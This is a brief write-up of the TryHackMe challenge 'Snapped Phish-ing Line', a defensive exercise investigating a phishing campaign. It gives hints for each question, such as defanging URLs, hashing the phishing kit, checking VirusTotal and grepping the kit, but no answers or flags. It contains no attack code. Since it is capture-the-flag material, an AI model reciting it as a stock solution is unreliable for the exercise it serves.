Write-ups "Snapped Phish-ing Line" Tryhackme Chall | https://tryhackme.com/room/snappedphishingline
- Who is the individual who received an email attachment containing a PDF?
- Just open phish-emails folder and reviews all emails :)
- What email address was used by the adversary to send the phishing emails?
- See the "FROM" line in the mail.
- What is the redirection URL to the phishing page for the individual Zoe Duncan? (defanged format)
- Use CyberChef to defang the URL :
You just need to see the code source of the .html phishing file and you got the URL redirection.
- What is the URL to the .zip archive of the phishing kit? (defanged format)
- Just enumerate the website :
Use Cyberchef to defang the URL.
4.What is the SHA256 hash of the phishing kit archive?
- Download the .zip archive, open the terminal and use sha256sum on the file
- When was the phishing kit archive first submitted? (format: YYYY-MM-DD HH:MM:SS UTC)
- Use the famous site https://www.virustotal.com and put the hash of the .zip archive and go to the good place to get the answer ;)
- When was the phishing domain that was used to host the phishing kit archive first registered? (format: YYYY-MM-DD)
- Generally i use https://urlscan.io/ but i did not find the answer on this website. So use https://threatbook.io/
- What was the email address of the user who submitted their password twice?
- When you enumerate the website you can see a log.txt search into this file.
- What was the email address used by the adversary to collect compromised credentials?
- Open the .zip archive, and search the good file to get the answer. (clue is in the "Validation" folder and in .php file.
- The adversary used other email addresses in the obtained phishing kit. What is the email address that ends in "@gmail.com"?
- Unzip the .zip archive and get a simple grep command with -r in this folder.
- What is the hidden flag?
- When you enumerate the website you fond a flag.txt file.
Base64 ? Yeah juste decode him :)
(; noitcerid thgir eht ni srettel eht tup
Thanks Orzykf and Tryhackme for this funny chall !